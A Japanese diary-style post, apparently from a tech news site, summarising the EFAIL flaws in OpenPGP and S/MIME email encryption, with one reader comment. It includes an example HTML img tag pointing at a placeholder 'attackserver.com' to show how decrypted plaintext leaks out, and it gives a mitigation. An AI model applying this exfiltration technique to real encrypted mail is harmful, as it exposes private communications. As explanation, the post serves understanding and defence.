beroの日記: OpenPGP S/MIMEに脆弱性 1
日記 by
bero
OpenPGP S/MIMEに脆弱性
ざっくり理解
1. ダイレクトエクスフィルトレーション(直接引き出し)
特定メールソフトの脆弱性
- MITM等で暗号化メールを入手する
- <img src="http://attackserver.com/暗号文"> のhtmlメールを送りつける
- 受信者のメーラが復号して <img src="http://attackserver.com/平文"> になる
- 受信者のメーラが img 画像表示のため http://atackserver.com/平文 にアクセス
- attackserver.com に 平文がわたる
2. CBC / CFBガジェット攻撃
S/MIME PGPの仕様脆弱性
- S/MIME PGP内部で使われてる CBC/CFB方式の特徴から、鍵がなくても暗号化された <img src= を作ることができる?
- それをくっつけて以下同じ?
1. では 「平文と暗号文が混ざったもの」が平文になるのを「特定メールソフトの脆弱性」
2. では 「加工した暗号文を生成可能」なのを 「仕様脆弱性」としている
対策: htmlレンダリングしない、となってるが、htmlメールで外部リソースを見ない、だけでもいいような気がする(thunderbirdでは デフォルトでそうなってる)
追記: 訳した人がいた
シンプルだなぁ (スコア:0)
これだけ単純なら誰かが先に思いついていそうだし、攻撃も国や公衆Wi-Fiなら容易。
エンドトゥーエンド暗号化は通信経路が信用できなくても確実なのが強みだし、使っている人が少ないから大概秘密にしたい内容のはず。
しかし、後付けの事も多いから普通に実装するとこうなるわなという。
切り替わる所で全タグ閉じれば良かったんだろうけど地味に面倒だもんね。
そういう機能がXML自体にあれば良いのに。
ところで話題になった割にsradに来るのはちょっと遅かった感。
自分でたれこみゃ良かったんだがめんどくさかった。